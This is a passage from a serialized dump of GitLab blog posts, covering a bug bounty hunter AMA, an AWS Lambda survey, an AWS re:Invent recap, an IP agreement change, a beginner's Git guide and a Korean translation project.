soon.”",[974,9,685],"customers",{"slug":976,"featured":6,"template":689},"arm-open-source-makes-a-seamless-migration-to-gitlab","content:en-us:blog:arm-open-source-makes-a-seamless-migration-to-gitlab.yml","Arm Open Source Makes A Seamless Migration To Gitlab","en-us/blog/arm-open-source-makes-a-seamless-migration-to-gitlab.yml","en-us/blog/arm-open-source-makes-a-seamless-migration-to-gitlab",{"_path":982,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":983,"content":989,"config":996,"_id":998,"_type":14,"title":999,"_source":16,"_file":1000,"_stem":1001,"_extension":19},"/en-us/blog/ask-a-hacker-a-conversation-with-ahacker1",{"title":984,"description":985,"ogTitle":984,"ogDescription":985,"noIndex":6,"ogImage":986,"ogUrl":987,"ogSiteName":673,"ogType":674,"canonicalUrls":987,"schema":988},"Ask a hacker: A conversation with ahacker1","Alexander Siyou Tan, also known as ahacker1, joined us for an AMA to discuss how he got into hacking and some of his best bug bounty hunting strategies.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1750098255/Blog/Hero%20Images/Blog/Hero%20Images/blog-image-template-1800x945%20%282%29_5kE1qyriiwHs6cpvIwuyB_1750098255490.png","https://about.gitlab.com/blog/ask-a-hacker-a-conversation-with-ahacker1","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Ask a hacker: A conversation with ahacker1\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ottilia Westerlund\"}],\n        \"datePublished\": \"2024-12-12\",\n      }",{"title":984,"description":985,"authors":990,"heroImage":986,"date":992,"body":993,"category":10,"tags":994},[991],"Ottilia Westerlund","2024-12-12","At GitLab we have a tradition: Every year, we invite a bug bounty hunter to join us for an AMA. This year, we met with Alexander Siyou Tan, also known as [ahacker1](https://hackerone.com/ahacker1?type=user), and did a deep dive into all aspects of bug bounty hunting.\n\n## About Alexander (ahacker1)\n\nAlexander is passionate about hacking complex SaaS applications, with a particular interest in authorization-based vulnerabilities. Currently, he's focusing on [SAML and SSO](https://about.gitlab.com/blog/the-ultimate-guide-to-enabling-saml/) research. His hacking journey began during the Covid-19 pandemic, when he transitioned from gaming to exploring game hacks and easter eggs.\n\n## Highlights from the AMA\n\nHere are some of the questions AMA attendees asked Alexander, and his responses.\n\n**What are the tools you use in your research?**\n\nI use RubyMine as my IDE, as I find it helps with analyzing code. You can jump to  different parts of the code, and that helps with efficiency and allows you to search quickly and determine interesting behavior. I used to just use BurpSuite, but not so much anymore. I mainly focus on using JetBrains to review repositories on GitLab.\n\n**Have you explored using AI to assist in finding and/or exploiting vulnerabilities?**\n\nYes! When I learn about a new feature or subject, I may ask ChatGPT how it works. It may give some insights or leads – when I do SAML research I use it.\n\n**Tell us about moving into SAML and the experience of finding the awesome bugs in that area.**\n\nSAML is like a SaaS application within a SaaS application. There's a 100-page document on how SAML works, offering infinite possibilities. I focus on code analysis, reviewing the approximately 20 libraries available. While hacking SAML can be time-consuming due to setup and configuration, the payoff can be significant.\n\n**What’s next after SAML? Will you keep digging?**\n\nI will fix SAML. I want to fix libraries. Not sure what’s next - maybe SSO stuff!\n\n### Alexander's tips for the GitLab Bug Bounty Program\n\nAlexander offered the following advice for those interested in GitLab's Bug Bounty Program:\n\n1. Leverage GitLab's open source nature for code analysis.\n2. Study patch releases to learn reverse-engineering techniques.\n3. Review GitLab's public issues and disclosed reports for insights.\n\n### Getting to know our hacker\n\n**What do you do when you don't hack?**\n\nI play games, I also go out on walks and explore nature/hike. It’s a nice break from sitting at the computer.\n\n**How long do you think you would survive in a zombie apocalypse?**\n\nNot long. Without the internet, I don’t think I'd be able to adapt.\n\n**Is cereal a type of soup?**\n\nIt most definitely is. It has both liquid and food in it.\n\n## Watch the replay\n\nFor those interested in the full AMA, check out the YouTube live playback.\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/EPV0eNOOfv4?si=byNqXWKZzZLXfLfW\" title=\"GitLab Ask a Hacker AMA with Alexander Siyou Tan (@ahacker1)\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\nWe extend our gratitude to all participants and, of course, to Alexander for sharing his insights. Keep up with Alexander's latest activities on his [HackerOne profile](https://hackerone.com/ahacker1).\n\n## More \"Ask a Hacker\" AMAs\n\n- [Ask a hacker - 0xn3va](https://about.gitlab.com/blog/ask-a-hacker/)\n- [Ask a hacker - ajxchapman](https://about.gitlab.com/blog/ajxchapman-ask-a-hacker/)\n- [Ask a hacker - rpadovani](https://about.gitlab.com/blog/rpadovani-ask-a-hacker/)\n\n## About the GitLab Bug Bounty Program\n\nThe GitLab Bug Bounty Program aims to enhance the security of our products and services. Managed by our Application Security team, the program has achieved significant milestones since its public launch in December 2018, including:\n\n* Resolved 1,684 reports\n* Awarded over $4.7 million in bounties\n* Thanked 655 hackers for their findings\n\n> Learn more about the [GitLab Bug Bounty Program](https://hackerone.com/gitlab).\n",[995,865,9,267],"bug bounty",{"slug":997,"featured":91,"template":689},"ask-a-hacker-a-conversation-with-ahacker1","content:en-us:blog:ask-a-hacker-a-conversation-with-ahacker1.yml","Ask A Hacker A Conversation With Ahacker1","en-us/blog/ask-a-hacker-a-conversation-with-ahacker1.yml","en-us/blog/ask-a-hacker-a-conversation-with-ahacker1",{"_path":1003,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1004,"content":1010,"config":1016,"_id":1018,"_type":14,"title":1019,"_source":16,"_file":1020,"_stem":1021,"_extension":19},"/en-us/blog/aws-lambda-usage-stats",{"title":1005,"description":1006,"ogTitle":1005,"ogDescription":1006,"noIndex":6,"ogImage":1007,"ogUrl":1008,"ogSiteName":673,"ogType":674,"canonicalUrls":1008,"schema":1009},"AWS Lambda usage survey results","The results of our quick AWS Lambda usage survey","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749664102/Blog/Hero%20Images/gitlab-values-cover.png","https://about.gitlab.com/blog/aws-lambda-usage-stats","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"AWS Lambda usage survey results\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Viktor Nagy\"}],\n        \"datePublished\": \"2019-11-27\",\n      }",{"title":1005,"description":1006,"authors":1011,"heroImage":1007,"date":1013,"body":1014,"category":10,"tags":1015},[1012],"Viktor Nagy","2019-11-27","\nThis blog post was originally published on the GitLab Unfiltered blog. It was reviewed and republished on 2019-12-03.\n{: .alert .alert-info .note}\n\nIn early October, I asked the community to [share your AWS Lambda tooling habits](https://forms.gle/9xhjaPxKdZsHDs2V9), so we can better serve your needs from within GitLab. This blog post presents the results of that survey. The survey was shared on Reddit, some Facebook Groups, and on the GitLab Twitter and Facebook channels. All told we received 58 responses which makes the results thought-provoking, but certainly not conclusive. \n\n## Intro\n\nSo, what did I ask you about? I had a few assumptions in mind when I put together the survey.\n\n- Lambda is mostly used by developers, but - at least in the enterprise - ops people might be involved too, because of monitoring or security.\n- There are differences between hobby and professional usage, and I wanted to be able to try to filter out hobby users.\n- Serverless has an adoption path in the enterprise. This might result in it being used only for backoffice scripts at first. So I wanted to know if it's used in production or backoffice scripting only.\n\nBesides testing these assumptions, I wanted to learn about usage habits with respect to:\n\n- Frameworks used (if any)\n- Testing tools and approaches used\n- CI/CD tools used\n- Monitoring and debugging tools and approaches followed\n\nWho answered the survey?\n{: .note.text-center}\n\n![User role](https://about.gitlab.com/images/blogimages/aws-lambda-survey-2019/aws-population.png)\n\n## How do we write code for AWS Lambda\n\nThe first interesting topic was what frameworks were being used for AWS Lambda. It was possible to select multiple options and responders could even provide a free text answer.\n\n![Company size](https://about.gitlab.com/images/blogimages/aws-lambda-survey-2019/aws-frameworks.png){: .small.left.wrap-text}\n\nAs many responders chose more than just a single option, we should look a bit behind the data to understand more. From that you can see that the [serverless framework](/topics/serverless/) is popular with these respondents and its use is  wide-spread. The *Other* section is quite scattered and there are no other big players; responses included Zappa, Chalice, Netlify function, etc. \n\nI thought that there might be differences once I controlled for the company size. I expected more Terraform and less CLI usage as the company size increases. I didn't look into statistical significance, but a simple eye-ball test shows that SMBs are going heads down with tech stacks. They are the strongest users of both serverless and Terraform. I'd say that enterprise users try to follow along, but have a quite big direct usage of AWS CLI too. Why might this be true? A few scenarios come to mind that can think about:\n\n- Enterprises are lagging in terms of technology adoption, thus their Terraform usage is lower\n- They use AWS CLI more extensively as the serverless framework can't fulfill all their use cases\n- Possibly we don't have enough data and with a stronger analysis it would turn out that there are no differences\n\n## What about testing\n\nWhen asked about the challenges serverless technologies pose one topic repeatedly arose: the lack of good testing infrastructure.\n\nAt GitLab we strive to provide outstanding CI/CD capabilities for testing. We also work hard to spread best practices. \n\nI asked the community about the current approaches they take to CI/CD and testing. Here again, multiple answers were allowed.\n\n![Company size](https://about.gitlab.com/images/blogimages/aws-lambda-survey-2019/aws-testing.png){: .small.right.wrap-text}\n\nThis pie chart is filtered to show only non-hobby projects. Even here, almost every fifth project has no testing at all! Otherwise, we can barely speak about test pyramids here as the majority of the projects either don't run any tests or run only unit tests.\n\nGetting into the data by company size, we see what we would expect: as the company size grows, testing becomes more important.\n\n## CI/CD bias\n\nThe survey also contained a question about which CI/CD tools are being used. I skipped the analysis here. As the survey was mostly shared by GitLab team members, and through GitLab channels, clearly the majority of responders use GitLab. A wise choice! \n\n## Monitoring\n\nAlongside developing and deploying software, thinking about its operational health in production is just as important. This led me to ask a few questions on Lambda monitoring habits.\n\n![Company size](https://about.gitlab.com/images/blogimages/aws-lambda-survey-2019/aws-monitoring.png){: .small.left.wrap-text}\n\nEven given the small sample size, I was surprised the vast majority choose AWS CloudWatch. I expected most production environments would use more advanced instrumentation, and I was wrong.\n\nA related question I asked is, \"What metrics are you  most interested in?\" This was a free-text answer. There were no surprises here with \"error rates\" coming out as the clear winner.\n\n## Conclusion\n\nBased on the survey it became clear that even today, GitLab can be used very well with AWS lambda. To make getting started easy, we've created a project template that uses GitLab Pages to host the frontend of your app, and AWS Lambda for your backend needs. Besides the basic hosting needs, our templates have `serverless-offline` support added, so you can start writing tests against it without any additional setup needed. You can easily begin by starting a [new project using the Serverless Framework/JS template](https://gitlab.com/projects/new).\n\n![Easy getting started with project templates](https://about.gitlab.com/images/blogimages/aws-lambda-survey-2019/aws-project-template.png){: .medium}\n\nThese were the insights I gathered about the data. Because this data was provided by the community, I'm making it available to everyone. You can [download the responses as a csv](/images/blogimages/aws-lambda-survey-2019/aws-lambda-survey-responses.csv). In case you are serious about Serverless usage in production, I'd love to hear your insights! Feel free to [reach out to me](https://gitlab.com/nagyv.gitlab)!\n",[267,9,231],{"slug":1017,"featured":6,"template":689},"aws-lambda-usage-stats","content:en-us:blog:aws-lambda-usage-stats.yml","Aws Lambda Usage Stats","en-us/blog/aws-lambda-usage-stats.yml","en-us/blog/aws-lambda-usage-stats",{"_path":1023,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1024,"content":1030,"config":1039,"_id":1041,"_type":14,"title":1042,"_source":16,"_file":1043,"_stem":1044,"_extension":19},"/en-us/blog/aws-reinvent-recap",{"title":1025,"description":1026,"ogTitle":1025,"ogDescription":1026,"noIndex":6,"ogImage":1027,"ogUrl":1028,"ogSiteName":673,"ogType":674,"canonicalUrls":1028,"schema":1029},"Highlights from AWS re:Invent 2018","Catch up on what GitLab got up to at AWS re:Invent last week! Reinventing pipelines, emerging as a single application, theCUBE interviews, and more.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679994/Blog/Hero%20Images/aws_booth_2018.jpg","https://about.gitlab.com/blog/aws-reinvent-recap","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Highlights from AWS re:Invent 2018\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Priyanka Sharma\"}],\n        \"datePublished\": \"2018-12-06\",\n      }",{"title":1025,"description":1026,"authors":1031,"heroImage":1027,"date":1033,"body":1034,"category":299,"tags":1035},[1032],"Priyanka Sharma","2018-12-06","\n\nLast week GitLab was at AWS re:Invent 2018, the marquee event for cloud computing in the US. As the frontrunner in the space, Amazon has built re:Invent to be a juggernaut. This year it commanded most of the Las Vegas strip and had over 50,000 attendees. As a first-time visitor myself, I was impressed by the sheer scale and efficiency of the event. I was also thrilled to achieve my personal goal of giving my first talk with a live demo using code and GitLab. As for GitLab, we saw that our company emerged as a leader in the DevOps space with a single application for the whole software development lifecycle.\n\n## Highlights\n\n### Reinventing CI/CD pipelines\n\nOur CEO [Sid Sijbrandij](/company/team/#sytses) and I did a talk and live demo about reinventing CI/CD pipelines using GitLab, [Kubernetes](/solutions/kubernetes/), and EKS. This was our first hint that this re:Invent was going to be special. The talk was bursting at the seams with attendees, as we shared both the challenges of the toolchain crisis engulfing our ecosystem, and about how a single application for the entire DevOps lifecycle can make an improvement of over 200 percent in cycle times. You can [check out the presentation here](https://docs.google.com/presentation/d/1x1g4pfpoaav9lhcYkjAJylLMl-9S0JFTeKXlNF98O-I/edit?usp=sharing).\n\n![Sid Sijbrandij and Priyanka Sharma on stage at AWS re:Invent](https://about.gitlab.com/images/blogimages/aws-2018/aws_2018_sid_talk_stage.jpeg){: .shadow.medium.center}\n\nThe demo, which showed us running a CI/CD pipeline and deploying code to Kubernetes on EKS, is an example of the [cloud native workflows](/topics/cloud-native/) users can push via GitLab. It is such competency that makes Kubernetes on EKS a breeze and is the reason GitLab was awarded the [AWS Partner DevOps Competency Certification](/blog/gitlab-achieves-aws-devops-competency-certification/) to confirm our viability and excellence as a DevOps solution for companies using AWS Cloud.\n\n### Validation for our vision\n\nOur experience at re:Invent was one of validation and emergence. As a company, we saw that our efforts to build the first single application for the entire DevOps lifecycle have paid off and our users resonated with our message. Most folks who came to our booth were aware that GitLab played a part in multiple stages (if not all) of their workflow and many were avid [GitLab CI](/solutions/continuous-integration/) fans. Gone are the days when [version control](https://docs.gitlab.com/ee/topics/gitlab_flow.html) was the only thing GitLab was associated with.\n\n![Collage from GitLab at AWS re:Invent](https://about.gitlab.com/images/blogimages/aws-2018/aws_booth_collage.jpeg){: .medium.center}\n\nOur VP of Alliances, [Brandon Jung](/company/team/#brandoncjung), [appeared on theCUBE](https://www.youtube.com/watch?v=Ejs5xGAhL8s) with a company called Beacon. As the former head of partnerships at Google Cloud, Brandon has a long history with GitLab. He has seen the company grow over the years and shared how our rocketship ascent across the DevOps lifecycle convinced him of the potential. He said, \"In just over two years, [GitLab became the frontrunner for continuous integration](/blog/gitlab-leader-continuous-integration-forrester-wave/), according to Forrester. That's impressive.\"\n\n### Livestream with The New Stack\n\nI also represented GitLab on [a livestream podcast](https://www.pscp.tv/w/1eaJbODAepnxX) with [The New Stack](https://thenewstack.io/), [Matt Biilmann](https://twitter.com/biilmann?lang=en), CEO of [Netlify](/blog/netlify-launches-gitlab-support/), and [Joe Beda](https://twitter.com/jbeda), founder of [Heptio](https://heptio.com/) and creator of Kubernetes. We discussed GitOps, NoOps, and the toolchain crisis. As Matt wisely said, \"Trust in open source is critical to cloud computing and the ecosystem. Companies like GitLab will keep the players honest.\"\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n  \u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">GitOps, NoOps and the tool chain crisis. \u003Ca href=\"https://t.co/mtfm8OaYYD\">https://t.co/mtfm8OaYYD\u003C/a>\u003C/p>&mdash; The New Stack (@thenewstack) \u003Ca href=\"https://twitter.com/thenewstack/status/1067881587214184448?ref_src=twsrc%5Etfw\">November 28, 2018\u003C/a>\u003C/blockquote>\n  \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\nWe thank AWS for creating this amazing ecosystem of end users and practitioners who came together in Vegas last week. Next year will be bigger, better. Until then, see you all at [KubeCon](/events/)! 😃\n",[1036,267,1037,277,930,1038,803,9],"CI","demo","kubernetes",{"slug":1040,"featured":6,"template":689},"aws-reinvent-recap","content:en-us:blog:aws-reinvent-recap.yml","Aws Reinvent Recap","en-us/blog/aws-reinvent-recap.yml","en-us/blog/aws-reinvent-recap",{"_path":1046,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1047,"content":1052,"config":1058,"_id":1060,"_type":14,"title":1061,"_source":16,"_file":1062,"_stem":1063,"_extension":19},"/en-us/blog/balanced-piaa",{"title":1048,"description":1049,"ogTitle":1048,"ogDescription":1049,"noIndex":6,"ogImage":900,"ogUrl":1050,"ogSiteName":673,"ogType":674,"canonicalUrls":1050,"schema":1051},"Announcing a more balanced Proprietary Information and Assignment Agreement","We've amended our PIAA to help our contributors maintain their ability to work on projects that are unrelated to GitLab business, including other open source projects.","https://about.gitlab.com/blog/balanced-piaa","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Announcing a more balanced Proprietary Information and Assignment Agreement\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Jamie Hurewitz\"}],\n        \"datePublished\": \"2017-12-18\",\n      }",{"title":1048,"description":1049,"authors":1053,"heroImage":900,"date":1055,"body":1056,"category":299,"tags":1057},[1054],"Jamie Hurewitz","2017-12-18","\n\nWe recently [switched from a Contributor License Agreement (CLA) to a Developer's Certificate of\nOrigin (DCO)](/blog/gitlab-switches-to-dco-license/)\nto make it easier for everyone to contribute to GitLab. Now, we're taking our commitment to\nour core tenet, \"everyone can contribute,\" a step further. We're amending our Proprietary\nInformation and Assignment Agreement (PIAA) and putting clarifying processes in\nplace to help our contributors maintain their ability to work on projects that\nare unrelated to GitLab's business, including other open source projects.\n\n\u003C!-- more -->\n\nGitHub [announced the Balanced Employee Intellectual Property Agreement](https://github.com/blog/2337-work-life-balance-in-employee-intellectual-property-agreements)\n(BEIPA), an open source intellectual property (IP) agreement which seeks to take\na more balanced approach to assigning control over IP. We want to\nthank GitHub for taking the lead on a very important conversation. Their new\napproach inspired us to take a closer look at our own PIAA, make improvements to better clarify our\nposition, and encourage our contributors to work on projects outside of GitLab if they want to.\n\nWe [recently launched a Twitter poll](https://twitter.com/gitlab/status/938921270913019904)\nto assess the potential risk IP agreements pose to developers in our community.\nWe found that the majority of developers (85 percent) have a side project and nearly half\n(44 percent) have worried about the IP ownership of that project. Forty-four percent\nsay they have used company resources for a side project, potentially putting them\nat risk of violating their workplace IP agreement.\n\nAt GitLab, we want to give our contributors confidence that their developments\nwill *not* be owned by GitLab simply by virtue of their use of GitLab-issued computers,\nGitLab facilities, or the GitLab source code repository. Furthermore, we want to\nalleviate stress of not knowing whether they are in violation, given that there\nis necessarily some ambiguity about which projects relate to or don't relate to\nour business. So, we are making some changes.\n\nOne of [our values is boring solutions](https://handbook.gitlab.com/handbook/values/#efficiency).\nWith this in mind we looked at either adopting the BEIPA outright or contributing\nto the document. After considerable thought we concluded that it wasn’t possible\nto make either of these approaches work. Accordingly, we focused on improving our\nexisting PIAA.\n\n## Why the change?\n\nThe industry standard for intellectual property agreements tend to assign a broad\nswath of IP to the employer, making it difficult for a contributor to work on\noutside projects without being in violation of the agreement. The most important\npiece of any employee agreement is the definition of what IP is assigned from the\nemployee to the company.\n\nThe industry standard is to define the scope of the IP definition in three buckets:\n\n1. IP that relates to the current or prospective business of the company\n2. IP created by the employee as part of its work for the company\n3. IP created using materials, facilities, funding, or confidential information of the company\n\nWe want to alleviate the unnecessary risks posed to contributors posed by buckets 1 and 3 above.\n\n## What's changing\n\nAs a result of our internal review, we are making three important changes to our PIAA\nand processes related to outside creations developed by our contributors:\n\n1. We have entirely eliminated the section in our PIAA that would grant GitLab ownership\nin developments simply by virtue of the use of GitLab equipment, including\nGitLab-issued computers, GitLab facilities, or GitLab.com as a software\ndevelopment platform.\n\n2. In the event there is concern on our contributor’s behalf that there may be a gray\narea, we have created a process whereby GitLab can confirm that the development is\noutside the scope of GitLab’s business.\n\n3. We have [added plain language text to our publicly viewable Handbook](/handbook/people-group/contracts-probation-periods/#approval-for-outside-projects) that clarifies\nwhen contributors should seek further assurances from GitLab and when\nthey shouldn’t.  \n\nOur goal is to give contributors a way to gain confidence in their ability to pursue\nindependent projects ahead of time, and reduce the risk of potential conflicts down the line.\n",[930,9,803],{"slug":1059,"featured":6,"template":689},"balanced-piaa","content:en-us:blog:balanced-piaa.yml","Balanced Piaa","en-us/blog/balanced-piaa.yml","en-us/blog/balanced-piaa",{"_path":1065,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1066,"content":1072,"config":1079,"_id":1081,"_type":14,"title":1082,"_source":16,"_file":1083,"_stem":1084,"_extension":19},"/en-us/blog/beginner-git-guide",{"title":1067,"description":1068,"ogTitle":1067,"ogDescription":1068,"noIndex":6,"ogImage":1069,"ogUrl":1070,"ogSiteName":673,"ogType":674,"canonicalUrls":1070,"schema":1071},"A guide to Git for beginners","Our senior developer evangelist answers newbie questions about Git.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749681222/Blog/Hero%20Images/git-15th-anniversary-cover.png","https://about.gitlab.com/blog/beginner-git-guide","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"A guide to Git for beginners\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Brendan O'Leary\"}],\n        \"datePublished\": \"2020-04-13\",\n      }",{"title":1067,"description":1068,"authors":1073,"heroImage":1069,"date":1075,"body":1076,"category":682,"tags":1077},[1074],"Brendan O'Leary","2020-04-13","\n\n_If you're just learning about software development, or are brand new to open source, it won't be long before you encounter Git, a source code management tool and arguably one of the most successful open source projects ever. We asked senior developer evangelist [Brendan O'Leary](/company/team/#brendan) to fill in the background on Git's history and successes in honor of its 15th anniversary._\n\n## What is source code management?\n\nBefore you start in software engineering it's important to understand the concept of [source code management](/solutions/source-code-management/). In its simplest form software is a bunch of text files and if I'm using those by myself it's not a big deal. But when multiple people use multiple files it gets out of hand and you need some way to manage it all. Humans can't necessarily manage all of that easily: If you're working with files A and C and I'm working with C and D, you need a way to bring all the changes we've made together without overriding anything or causing any conflict. A computer can more easily figure that out, and in a nutshell, that's what source code management is.\n\n## Why the term Git?\n\nThere are several different urban legends about this. Linus Torvalds who wrote it is a pretty gruff person [with some acknowledged sharp edges](https://www.newyorker.com/science/elements/after-years-of-abusive-e-mails-the-creator-of-linux-steps-aside). And so the story suggests he actually named it after himself, as in the British slang word, [“git”](https://www.merriam-webster.com/dictionary/git). That may be apocryphal. Also, it's a three-letter combo, meaning it's short and didn't conflict with any existing Unix commands. Now people say it stands for “Global Information Tracker” or “GD Idiot Truckload of...” if you're mad at it.\n\n## But wait. Who is Linus Torvalds?\n\nLinus Torvalds is a Finnish-American software engineer who developed the [Linux kernel](https://www.howtogeek.com/howto/31632/what-is-the-linux-kernel-and-what-does-it-do/) and then invented Git 15 years ago. Torvalds has been quoted as saying he's more \"famous\" for Linux but that over time, Git will [end up being more important](https://www.techrepublic.com/article/linus-torvalds-git-proved-i-could-be-more-than-a-one-hit-wonder/). Torvalds is also widely seen as the godfather of the open source movement.\n\n## Can you explain the rationale behind the cult following of open source?\n\nTorvalds himself has a cult following and open source has been around for a very long time, long before Git was invented. But open source wasn't widely accepted and in some cases, companies were actively hostile to the concept. Torvalds wanted to create a project everyone could contribute to and Git was born (literally developed by Torvalds over a weekend 15 years ago). Git solved a problem that was common across all types of software development and it not only welcomed contributions from users, it _needed_ contributions to grow. The idea of a practical solution everyone could contribute to created a kind of zeitgeist, and today open source is widely embraced as a result.\n\n## How could I explain Git to my neighbor?\n\nWe tend to talk about Git as a tree but I really don't know if that is the best analogy for it. It's a tree in the sense that it makes branches, but then those branches come back together and that doesn't happen in a tree.\n\nInstead, I'd say Git is like a time machine. The whole history of everything that happened on any branch in alternate timelines is brought back together magically. Nothing is lost or changed and you can look backward and move forward. It's magic.\n\n## What's the most important thing I should know about Git?\n\nThat's easy: You can't break it!\n\nBecause it's a magical time machine you really can't do anything to it that can't be fixed. So I always tell beginners to relax and play around with your copy. No matter how many mistakes you make you can't break it in a way that's not fixable.\n\nHave no fear.\n",[751,9,1078],"careers",{"slug":1080,"featured":6,"template":689},"beginner-git-guide","content:en-us:blog:beginner-git-guide.yml","Beginner Git Guide","en-us/blog/beginner-git-guide.yml","en-us/blog/beginner-git-guide",{"_path":1086,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1087,"content":1093,"config":1100,"_id":1102,"_type":14,"title":1103,"_source":16,"_file":1104,"_stem":1105,"_extension":19},"/en-us/blog/behind-the-scenes-of-gitlab-korean-translation",{"title":1088,"description":1089,"ogTitle":1088,"ogDescription":1089,"noIndex":6,"ogImage":1090,"ogUrl":1091,"ogSiteName":673,"ogType":674,"canonicalUrls":1091,"schema":1092},"Behind the scenes of GitLab's Korean translation","How a student project helped maintain linguistic consistency and deliver a unified user experience for the Korean GitLab community.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749664472/Blog/Hero%20Images/gitlabflatlogomap.png","https://about.gitlab.com/blog/behind-the-scenes-of-gitlab-korean-translation","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Behind the scenes of GitLab's Korean translation\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Inchul Yoo, Sunjung Park\"}],\n        \"datePublished\": \"2023-10-05\",\n      }",{"title":1088,"description":1089,"authors":1094,"heroImage":1090,"date":1096,"body":1097,"category":10,"tags":1098},[1095],"Inchul Yoo, Sunjung Park","2023-10-05","\nGitLab is translated into many languages by community members, ensuring our product reaches a much wider audience. In recent months, software and computer engineering students from Ajou University in South Korea contributed translations as part of their classroom project, led by Prof. Hwanyong Lee. Their contributions, together with many other members of our community, resulted in [100% of strings in the GitLab UI being translated into Korean](https://translate.gitlab.com/project/gitlab-ee/ko). \n\n![photo of Korean translation contributors](https://about.gitlab.com/images/blogimages/translation-contributors-swag.jpg){: .medium.center}\n\nIn this blog post, [Inchul Yoo](https://gitlab.com/iyoo), solutions architect at GitLab, and [Sunjung Park](https://gitlab.com/sunjungp), senior product Designer at GitLab, who also volunteer as proofreaders for the Korean translation of GitLab in the [GitLab Crowdin project](https://crowdin.com/project/gitlab-ee), had the privilege to interview Prof. Lee. He shared the students' experience in contributing to GitLab and discussed areas where additional collaboration is needed for translation.\n\nThank you for your contributions to GitLab: \n- Dahee Kim (김다희, 아주대학교)\n- Myeong Seok Nam (남명석, 아주대학교)\n- Jongho Baik (백종호, 아주대학교)\n- Seoyoung Lee (이서영, 아주대학교)\n- Sungmin Lee (이승민, 아주대학교)\n- Jaeyoon Lee (이재윤, 아주대학교)\n- Hwanyong Lee (이환용 교수, 아주대학교)\n\n## Interview with Prof. Hwanyong Lee\n\n**Could you tell us about Ajou University and the department?**\n\nAjou University aims to cultivate software talents with diverse roles in the field of software as its primary focus. Using GitLab, students have opportunities to learn through practical experience covering most aspects of the DevOps lifecycle, including issue management, version control, building, and deploying software.\n\n**When did you start using GitLab, and for what purpose?**\n\nSince 2018, when Ajou University became a software-focused institution, we started to utilize GitLab for educational purposes, including tasks such as assignments and submissions. Currently, our GitLab instance hosts over 9,000 projects and serves more than 2,200 students.\n\n**What motivated you to translate all of GitLab's product interface text into Korean?**\n\nOutside of my professional responsibilities, I have been actively contributing to diverse open source projects. Given my role as a professor, I saw an opportunity to underscore the significance of open source contributions to my students and inspire them to engage in such activities. During this semester, I established the objective of involving students in open source projects, specifically focusing on Korean localization. Remarkably, more than 10 students eagerly volunteered to participate in the translation efforts of more than 10 open source projects into Korean.\n\n**How many students participated in the GitLab translation project, and how long did it take?**\n\nThere were seven students in total, both majoring and minoring in software and computer engineering. We distributed the tasks among them to collaborate on the project. The entire project was completed in approximately half a semester, which took about two months.\n\n**Each student may have different translations for the same words. How did you handle this?**\n\nWe managed this by creating our own glossary to ensure uniform translations. We collaborated to achieve consistency in the wording, and we synced regularly to discuss and resolve any ambiguous or contentious issues.\n\n**What was the most challenging aspect of the project?**\n\nOne of the biggest challenges we faced was the continuous addition of new strings and phrases with each new GitLab update. Keeping up with these additions proved to be quite challenging. Additionally, there were instances where there was no direct Korean equivalent for English terms, or where additional contextual explanations were required, making the translation process more complex.\n\nWhen students identified inconsistencies that were not covered by the glossary, I encouraged them to bring these up in the regular sync. We tried to determine which translated terms were commonly used. And we used the [Korean TTA standards (Telecommunications Technology Association) dictionary](https://terms.tta.or.kr/main.do) as a primary point of reference.\n\n**Could you provide some closing thoughts regarding the contribution?**\n\nThe students were surprised to discover their ability to actively participate in the open source software they rely on, leading to a newfound sense of pride. This transformation signified a shift in the focus to embracing the concept of community and recognizing the genuine value of open source software through their contributions to shared community-driven objectives.\n\n### Learn how you can contribute to translation\nContributing to translation is a journey that goes beyond words; it's about building a global community and making technology more accessible. As Professor Lee mentioned, students discovered they could actively engage in open source software, and this filled them with pride. It's a rewarding journey that goes beyond language, and it's an opportunity to make a meaningful impact on the tech world.\n\nSoftware can only be as usable and accessible to its users as it is understandable by them. Translation helps bridge the linguistic and cultural gaps that might be preventing your software from being adopted by a given community. Together with contributors, proofreaders also play an important role in helping new contributors succeed by ensuring the consistency and quality of translations. Did you know that the term \"merge request\" can be translated into Korean in various ways?\n\nA good place to start is the [Translate GitLab page](https://docs.gitlab.com/ee/development/i18n/), where you can learn how you can contribute to GitLab's externalization, translation, proofreading, and merging. If you have any questions, please join translate.gitlab.com or post questions on the [Crowdin discussions forum](https://translate.gitlab.com/project/gitlab-ee/discussions).\n\nTo participate in discussions building a glossary list for Korean translation, join us at [gitlab.com/korean-translation/gitlab](https://gitlab.com/korean-translation/gitlab)! Once we finalize the glossary list and establish grammar rules, we aim to consistently elevate the quality of our 